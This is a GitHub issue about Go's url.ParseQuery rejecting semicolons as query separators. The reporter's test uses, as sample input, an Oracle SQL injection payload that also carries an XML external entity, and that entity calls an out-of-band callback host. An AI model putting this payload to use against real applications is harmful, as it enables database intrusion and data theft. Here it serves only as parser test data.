-
Notifications
You must be signed in to change notification settings - Fork 18.5k
Closed
Labels
Description
What version of Go are you using (go version)?
$ go version go version go1.17.2 darwin/amd64
Does this issue reproduce with the latest release?
Haven't tried
What operating system and processor architecture are you using (go env)?
go env Output
$ go env GO111MODULE="" GOARCH="amd64" GOBIN="" GOCACHE="/Users/jptosso/Library/Caches/go-build" GOENV="/Users/jptosso/Library/Application Support/go/env" GOEXE="" GOEXPERIMENT="" GOFLAGS="" GOHOSTARCH="amd64" GOHOSTOS="darwin" GOINSECURE="" GOMODCACHE="/Users/jptosso/go/pkg/mod" GONOPROXY="" GONOSUMDB="" GOOS="darwin" GOPATH="/Users/jptosso/go" GOPRIVATE="" GOPROXY="https://proxy.golang.org,direct" GOROOT="/usr/local/Cellar/go/1.17.2/libexec" GOSUMDB="sum.golang.org" GOTMPDIR="" GOTOOLDIR="/usr/local/Cellar/go/1.17.2/libexec/pkg/tool/darwin_amd64" GOVCS="" GOVERSION="go1.17.2" GCCGO="gccgo" AR="ar" CC="clang" CXX="clang++" CGO_ENABLED="1" GOMOD="/dev/null" CGO_CFLAGS="-g -O2" CGO_CPPFLAGS="" CGO_CXXFLAGS="-g -O2" CGO_FFLAGS="-g -O2" CGO_LDFLAGS="-g -O2" PKG_CONFIG="pkg-config" GOGCCFLAGS="-fPIC -arch x86_64 -m64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -fdebug-prefix-map=/var/folders/_r/p6w6znr53cl59s7gnnszz4sm0000gn/T/go-build3105120933=/tmp/go-build -gno-record-gcc-switches -fno-common"
What did you do?
func TestUrlPayloads2(t *testing.T) {
out := `var=EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;`
c, err := url.ParseQuery(out)
if err != nil {
t.Error("failed to parse query", err)
}
if p, ok := c["var"]; !ok {
t.Error("Expected var to be in the map, got ", c)
} else if len(p) != 1 || p[0] != out {
t.Error("failed to set var")
}
}Output: invalid semicolon separator in query
What did you expect to see?
I have tried it with many web application frameworks and languages (php, ror, nodejs) and it works as expected:
Array
(
[var] => EmptyValue'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM "http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/">%awpsd;
)
I know golang supports & and ; as separators but I think it should be changed just to & and ignore ;.
What did you see instead?
I get an empty map[string][]string and an error